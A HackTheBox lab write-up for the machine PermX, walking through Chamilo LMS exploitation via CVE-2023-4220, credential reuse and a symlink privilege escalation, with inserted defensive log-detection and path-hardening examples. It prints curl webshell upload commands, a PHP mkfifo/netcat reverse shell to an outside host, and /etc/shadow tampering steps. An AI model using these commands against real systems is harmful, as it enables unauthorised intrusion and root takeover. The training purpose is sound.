Hackthebox: PermX

Foued SAIDI

Overview

PermX is an easy-difficulty machine from HackTheBox. It starts with subdomain enumeration, which uncovers a Chamilo LMS instance vulnerable to CVE-2023-4220 (an unauthenticated RCE) that gives us a foothold on the system. After pulling database credentials out of the Chamilo configuration, we abuse a bash script runnable with sudo that lets us symlink the root directory, modify the /etc/shadow file and gain root privileges.

PermX-info-card

Reconnaissance

We start by enumerating open ports with nmap:

Nmap

PS C:\Users\0xkujen> nmap -A -Pn 10.129.117.84 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-01 15:58 W. Central Africa Standard Time
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see the usual SSH port open alongside a web application on port 80 that redirects to http://permx.htb, so let’s add an entry for permx.htb to our /etc/hosts file.

Subdomain Enumeration - Ffuf

PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master/Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.permx.htb" -u "http://10.129.117.84" -fw 18

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.0.0
________________________________________________

:: Method : GET
:: URL : http://10.129.117.84
:: Wordlist : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 18
________________________________________________

[Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 195ms]:01] :: Errors: 0 ::
* FUZZ: www

[Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 3559ms]00:34] :: Errors: 0 ::
* FUZZ: lms

Enumerating subdomains with ffuf, we get www and lms. Let’s add these two to our /etc/hosts file as well and check what we have.

Web Application - http://lms.permx.htb

Navigating to the web application, we are greeted by a Chamilo login page:

Chamilo LMS

CVE-2023-4220

Taking a look at http://lms.permx.htb/README.md (found after some directory bruteforcing), we can see that the Chamilo version we’re dealing with is 1.11.xx:

Chamilo LMS

Looking for exploits targeting this version, I stumbled upon this insightful blog post about CVE-2023-4220, an unauthenticated big-upload remote code execution that gives us control over the system. So let’s try it out:
1- First, confirm that http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/ exists, and it does.
2- Create a simple PHP command file, such as <?php system('id'); ?>
3- Run curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' to upload the command file to the LMS platform.
4- Run curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php' to execute the command.
Lessgo:

kujen@kujen:~$ echo "<?php system('id');" > rce.php
kujen@kujen:~$ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
kujen@kujen:~$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And it has been successful!
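From the defender’s side, the two requests above leave a very recognisable trace in the Apache access log. The following is an added example, not part of the write-up: a small POSIX sh/awk filter that flags the unauthenticated POST to bigUpload.php and any fetch of a PHP-like file from the files/ drop directory. The endpoint paths are the ones used on the box; the log lines and the 192.0.2.10 client address are constructed.

```shell
#!/bin/sh
# Added example: flag the request shapes CVE-2023-4220 abuse leaves in an
# Apache combined-format access log. Paths are the Chamilo endpoints used on
# the box; the sample log below and the 192.0.2.10 client are constructed.
BIGUPLOAD_INC='/main/inc/lib/javascript/bigupload/inc/bigUpload.php'
BIGUPLOAD_FILES='/main/inc/lib/javascript/bigupload/files/'

# Reads access log lines on stdin and prints one line per hit:
#   UPLOAD  <client> <path>   POST to bigUpload.php with action=post-unsupported
#   EXEC    <client> <path>   request for a PHP-like file under the files/ drop dir
detect_bigupload() {
    awk -v inc="$BIGUPLOAD_INC" -v files="$BIGUPLOAD_FILES" '
    {
        method = substr($6, 2)          # $6 is the quoted method; strip the quote
        path = $7                       # request target, query string included
        if (method == "POST" && index(path, inc) == 1 && path ~ /action=post-unsupported/) {
            print "UPLOAD  " $1 " " path
            next
        }
        sub(/[?].*/, "", path)          # drop the query string before the extension test
        if (index(path, files) == 1 && path ~ /\.(php[0-9]?|phtml|phar)$/)
            print "EXEC    " $1 " " path
    }'
}

# Constructed sample: a normal page view, the unauthenticated upload, the
# client fetching the dropped file, and a harmless static asset that must not match.
SAMPLE_LOG='192.0.2.10 - - [01/Nov/2024:15:58:01 +0000] "GET /index.php HTTP/1.1" 200 19347 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Nov/2024:15:58:07 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 38 "-" "curl/8.5.0"
192.0.2.10 - - [01/Nov/2024:15:58:09 +0000] "GET /main/inc/lib/javascript/bigupload/files/rce.php HTTP/1.1" 200 54 "-" "curl/8.5.0"
192.0.2.10 - - [01/Nov/2024:15:58:10 +0000] "GET /main/inc/lib/javascript/bigupload/js/bigUpload.js HTTP/1.1" 200 8123 "-" "Mozilla/5.0"'

printf '%s\n' "$SAMPLE_LOG" | detect_bigupload
```

Run against a real log with `detect_bigupload < /var/log/apache2/access.log`; a hit on both lines from one client within seconds is the upload-then-execute sequence shown above.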
Let’s now get a shell on the system:

kujen@kujen:~$ cat rce.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.x.x 9001 >/tmp/f"); ?>
kujen@kujen:~$ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
kujen@kujen:~$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

And we are in:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.117.84] 56424
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Let’s now stabilize our shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
Next, let’s look for database credentials; we might find something juicy. Running find ./ -name config* 2> /dev/null from /var/www/chamilo turns up the ./app/config/configuration.php file, so let’s check it out:

www-data@permx:/var/www/chamilo$ cat ./app/config/configuration.php | grep -i password
<t ./app/config/configuration.php | grep -i password
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Security word for password recovery
$_configuration['password_encryption'] = 'bcrypt';
// Set to true to allow automated password conversion after login if
// password_encryption has changed since last login. See GH#4063 for details.
//$_configuration['password_conversion'] = false;
// Customize password generation and verification
/*$_configuration['password_requirements'] = [
'force_different_password' => false,
// Send two emails when creating a user. One with the username other with the password.
// Validate user login via a webservice, Chamilo will send a "login" and "password" parameters
'wget_password' => '',
// Use this link as the "Forgot password?" link instead of the default. This setting should be transformed into a hook for plugins at a later time
// Show/Hide password field in user profile. Adds a customizable link depending on the user status.
$_configuration['auth_password_links'] = [
'show_password_field' => false,
'show_password_field' => true,
// Ask user to renew password at first login.
// Requires a user checkbox extra field called "ask_new_password".
//$_configuration['force_renew_password_at_first_login'] = true;
// Add the "remember password" link to the "subscription to session" confirmation email
//$_configuration['email_template_subscription_to_session_confirmation_lost_password'] = false;
www-data@permx:/var/www/chamilo$

And we do have a password: “03F6lY3uXAP2bkW8”

Let’s try it against the mtz user we find under /home:

www-data@permx:/home$ su mtz
su mtz
Password: 03F6lY3uXAP2bkW8

mtz@permx:/home$ cd mtz
cd mtz
mtz@permx:~$ cat user.txt
cat user.txt
ed62845cbeaa21******************
mtz@permx:~$

And we are in and have our user.txt flag!

Privilege Escalation to root

Checking what mtz can run with sudo:

mtz@permx:~$ sudo -l
sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$

We can see that we can run the /opt/acl.sh script as root without a password. Checking its contents:

mtz@permx:~$ cat /opt/acl.sh
cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
mtz@permx:~$

Analyzing the script: it manages file permissions using ACLs (access control lists) in a controlled way, “securely” granting a given user permissions on files located within the /home/mtz folder. Its only guard is a check on the path string, and both the -f test and setfacl follow symlinks.
What we can do is symlink / into our home directory, point the script at /home/mtz/root/etc/shadow so that we get write access on /etc/shadow, modify the root password hash and then switch to root. Lessdoit:

mtz@permx:~$ cd /home/mtz
mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
mtz@permx:~$ nano /etc/shadow
mtz@permx:~$ su root
Password:
root@permx:/home/mtz# cat /root/root.txt
5d0e617b7c5ac2******************
root@permx:/home/mtz#
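The root cause is that the guard in /opt/acl.sh only inspects the path string while -f and setfacl operate on whatever the path resolves to. The following is an added example, not the box’s script or the author’s code: the script’s two tests rewritten as a POSIX sh function beside a hardened version that resolves symlinks with GNU realpath -e before deciding. A temporary directory stands in for /home/mtz (ACL_BASE is an assumption for running this outside the box), and the demo recreates the ln -s / root trick with /etc/passwd as the target.

```shell
#!/bin/sh
# Added example (not /opt/acl.sh itself). ACL_BASE stands in for /home/mtz.

# Mirrors the two tests in /opt/acl.sh: path must start with the base directory,
# must not contain "..", and must name a regular file. Nothing here notices that
# a component such as /home/mtz/root is a symlink to /, so -f follows it.
weak_check() {
    case "$1" in
        "$ACL_BASE"/*) ;;
        *) return 1 ;;
    esac
    case "$1" in
        *..*) return 1 ;;
    esac
    [ -f "$1" ]
}

# Hardened version: refuse a symlink leaf, resolve every component of both the
# target and the base to their physical paths (realpath -e fails if any part is
# missing), and only then require the resolved target to sit under the base.
hard_check() {
    [ -L "$1" ] && return 1
    real=$(realpath -e -- "$1" 2>/dev/null) || return 1
    base=$(realpath -e -- "$ACL_BASE" 2>/dev/null) || return 1
    [ -f "$real" ] || return 1
    case "$real" in
        "$base"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Demo reproducing the box: a symlink to / inside the "home" directory.
demo=$(mktemp -d) && mkdir "$demo/mtz" && ln -s / "$demo/mtz/root"
ACL_BASE="$demo/mtz"
target="$demo/mtz/root/etc/passwd"      # resolves to /etc/passwd
weak_check "$target" && echo "weak check: allowed $target"
hard_check "$target" || echo "hard check: denied, resolves outside $ACL_BASE"
rm "$demo/mtz/root" && rmdir "$demo/mtz" "$demo"   # removes only the link, not /
```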

And that was it for this box! Hope you enjoyed it <3
-0xkujen

  • Title: Hackthebox: PermX
  • Author: Foued SAIDI
  • Created at : 2024-11-01 15:52:28
  • Updated at : 2024-11-01 17:30:27
  • Link: https://kujen5.github.io/2024/11/01/Hackthebox-PermX/
  • License: This work is licensed under CC BY-NC-SA 4.0.